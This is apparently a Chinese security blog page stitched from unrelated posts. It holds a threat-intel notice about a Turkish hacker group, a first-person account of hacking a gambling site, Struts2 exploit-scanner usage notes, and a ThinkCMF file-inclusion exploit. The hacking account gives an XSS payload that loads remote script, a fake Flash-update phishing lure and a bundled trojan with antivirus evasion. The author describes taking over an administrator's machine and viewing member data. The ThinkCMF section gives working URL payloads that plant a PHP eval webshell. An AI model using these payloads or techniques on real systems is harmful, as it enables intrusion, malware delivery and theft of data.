ANONYMOUS 发布的文章

近日,一个最新组建的名为“图兰军”(“Turan Ordusu”)的土耳其fan华黑客组织。该组织于2019 年12 月22 日宣布成立,在其成立当日,一名昵称为“Yakamoz1319” 的组织成员在黑客论坛turkhackteam 上发帖号召土耳其黑客针对我国境内网站发起攻击,以实际行动表明对“东突厥斯坦”的支持。

通过知道创宇威胁情报中心持续监测,目前已发现大量政府、企业、医疗、教育、研究机构网站被该组织入侵。建议各党政机关和企事业单位网站加强相关防护措施,重点关注来自中东地区特别是土耳其的攻击。

1.png

2.png

3.png

4.png

他们论坛:https://www.turkhackteam.org

故事的起因

前几天收到一封邮件,内容是这样的:

1.png

你说发谁哪里不好,发到我这里来,正好最近辞职了没事干,搞下看看。
加上那个人的好友以后,象征性的聊了几句,大概就是:我说自己因为网赌没钱借了高利贷,让他带我玩这个,好还上贷款,没说几句就给我发了网址和邀请码(这个站没邀请码注册不上),让我去网站里面充钱,我说好,我先去冲一千,完事师傅你一定要好好带我,然后就去注册了(后来我没充钱,他就一直抖我,给我发消息,觉得烦就把他删了,所以聊天记录也没了,简单口述下没截图)。

漏洞挖掘

官网截图

2.png

信息收集阶段略过,太麻烦了,有云盾(WAF+CDN),看下面云悉指纹识别的图吧,测试各种功能点,没有结果,不得不说,大部分BC安全都是做的不错的。

3.png

想了会,看到一个聊天室功能,进去看看都在说啥,结果发现说话来来回回就那几个人,偶尔有几个和我一样的普通会员,我就感觉,这尼玛是不是托啊,一堆什么导师嚷嚷着跟着下注。

职业习惯

看见框就想叉,一发xss payload打过去:

4.png

wdnmd没反应?明明加载了啊…问了下别的师傅,说这种情况有可能是有CSP,附上相关介绍:

https://developer.mozilla.org/zh-CN/docs/Web/HTTP/CSP

我这里就不解释了,本来打算放弃,想了下万一 img 的没有被限制呢。

再吃我一发:

<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='XSSURL';>

5.png

叮 ~ 叮 ~ 手机响了,多么美妙的声音,payload成功执行,打来一堆cookie(还是不同域名),然而现实是残酷的,这个站有HttpOnly,cookie不能用,历史密码也没拿到,不过不要灰心,咱还有更猥琐的办法。

6.png

Flash水坑钓鱼

既然正面肛不动你,咱就来侧面的。前段时间经常看到无常师傅的flash钓鱼操作,很经典啊,然后就想到自己有天会用到flash官网的钓鱼源码,很早就写好了放在GitHub上:https://github.com/r00tSe7en/Fake-flash.cn

7.png

前期准备

一个免费空间,一个免费域名(域名可以搞一个 www.flashxxx.tk 这种的,可信度比较高),一个可以正常上线的马子。

然后xss平台搞个模块,简单解释下代码,一开始重写alert方法并屏蔽网址显示,弹出Flash升级提示,跳转至钓鱼页:

8.png

关于马子

可以做到运行正常安装文件的同时运行马子,骚姿势:自解压捆绑文件的利用

https://www.baikesec.com/webstudy/still/77.html

为了让自解压的exe文件可以正常运行(已经改成了正常的安装文件图标),必须确保他有解压软件,我就把钓鱼页的自解压文件压缩了下,成了 flashplayerpp_install_cn.zip,这样一来他必须安装解压文件才能打开安装程序,马子自然生效了。

关于免杀

由于技术有限,毕竟咱也不是搞免杀的,生成的马子会被部分杀软报毒,也不知道对面用什么杀软,所以想了个猥琐但有效的办法,其实不少下载站下载的文件也爱这么干,哈哈。

9.png

一切就绪

万事俱备,只欠东风,直接发出去刚才写的升级提示+跳转的xss payload:

10.png

页面成功弹出提示,对方不点确定页面就一直卡住,点了确定就跳来我的钓鱼页(这里钓鱼页也加了点料,让他点返回时无限回跳钓鱼页)

不过一开始并没有人上线,再点进去一看管理员重置了聊天页的内容。奥利给曾经说过:我们遇到什么困难也不要怕,咱换个号继续叉呗,在间歇性叉叉圈圈了十几次之后,管理员可能是实在忍不住了(管理员:大哥你别弹了,我装还不行嘛),终于运行了我的马子。

成功上线:

这里就上线了一台,不过很幸运,是管理员的机器,不然之前的努力都白费了。

11.png

看一会对面在干哈:

12.png

这个清楚点,可以看到还依然打开着钓鱼页,俩人还讨论亏钱了,笑死了:

13.png

打开了一个账面,这流水咱也看不懂:

14.png

再看看有存着啥好东西,两个硬盘一个U盘,C盘E盘没有什么:

15.png

F盘里有料了,都是一些会员数据,账单流水,管理后台配置啥的:

16.png

点到为止:

不多说了,看了下上线的IP,为了挣钱跑的挺远,老哥背井离乡怪不容易的,祝你安安心心的回到祖国的怀抱过个年吧。。。

17.png

Struts2漏洞利用扫描工具,基于互联网上已经公开的Structs2高危漏洞exp的扫描利用工具,目前支持的漏洞如下: S2-001, S2-003, S2-005, S2-007, S2-008, S2-009, S2-012, S2-013, S2-015, S2-016, S2-019, S2-029, S2-032, S2-033, S2-037, S2-045, S2-046, S2-048, S2-052, S2-053, S2-devMode, S2-057

1.png

支持单个URL漏洞检测和批量URL检测,至此指定漏洞利用,可获取WEB路径,执行命令,反弹shell和上传文件,注意,并不是所有的漏洞均支持上述功能,只有部分功能支持.

工具参数说明

Usage: Struts2Scan.py [OPTIONS]

Struts2批量扫描利用工具

Options:

-i, --info 漏洞信息介绍
-v, --version 显示工具版本
-u, --url TEXT URL地址
-n, --name TEXT 指定漏洞名称, 漏洞名称详见info
-f, --file TEXT 批量扫描URL文件, 一行一个URL
-d, --data TEXT POST参数, 需要使用的payload使用{exp}填充, 如: name=test&passwd={exp}
-c, --encode TEXT 页面编码, 默认UTF-8编码
-p, --proxy TEXT HTTP代理. 格式为http://ip:por
-t, --timeout TEXT HTTP超时时间, 默认10s
-w, --workers TEXT 批量扫描进程数, 默认为10个进程
--header TEXT HTTP请求头, 格式为: key1=value1&key2=value2
-e, --exec 进入命令执行shell
--webpath 获取WEB路径
-r, --reverse TEXT 反弹shell地址, 格式为ip:port
--upfile TEXT 需要上传的文件路径和名称
--uppath TEXT 上传的目录和名称, 如: /usr/local/tomcat/webapps/ROOT/shell.jsp
-q, --quiet 关闭打印不存在漏洞的输出,只保留存在漏洞的输出
-h, --help Show this message and exit.

批量漏洞检测:

$ python3 Struts2Scan.py -f urls.txt

POST数据:

$ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -d name=admin&email=admin&age={exp}

文章来源及下载:

https://github.com/HatBoy/Struts2-Scan

项目遇到个站点,ThinkCMF二次开发的,网上常见的payload打不下来,测试存在文件包含,本地搭了个环境研究了下换了个思路打下来了

由于thinkcmf2.x使用了thinkphp3.x作为开发框架,默认情况下启用了报错日志并且开启了模板缓存,导致可以使用加载一个不存在的模板来将生成一句话的PHP代码写入data/runtime/Logs/Portal目录下的日志文件中,再次包含该日志文件即可在网站根目录下生成一句话木马m.php

日志文件格式为YY_MM_DD.log,如当前日期为2019年12月12日,日志文件为19_12_12.log,完整路径为data/runtime/Logs/Portal/19_12_12.log

测试成功的环境

Linux

宝塔[PHP7.2]

Windwos

PHPstudy PHP7.1

Payload1:

http://target.domain/?a=display&templateFile=%3C?php%20file_put_contents(%27m.php%27,%27%3C%3fphp+eval($_POST[%22X%22])%3b%3F%3E%27);die();?%3E

1.png

然后请求 http://target.domain/?a=display&templateFile=data/runtime/Logs/Portal/YY_MM_DD.log

2.png

即可在 http://target.domain/根目录生成m.php,密码是X

3.png

Payload2:

首先访问 http://target.domain/?a=display&templateFile=%3C%3F%70%68%70%20%65%76%61%6C%28%24%5F%50%4F%53%54%5BX%5D%29%3B%3F%3E

然后菜刀连接 http://target.domain/?a=display&templateFile=data/runtime/Logs/Portal/YY_MM_DD.log 密码同样是X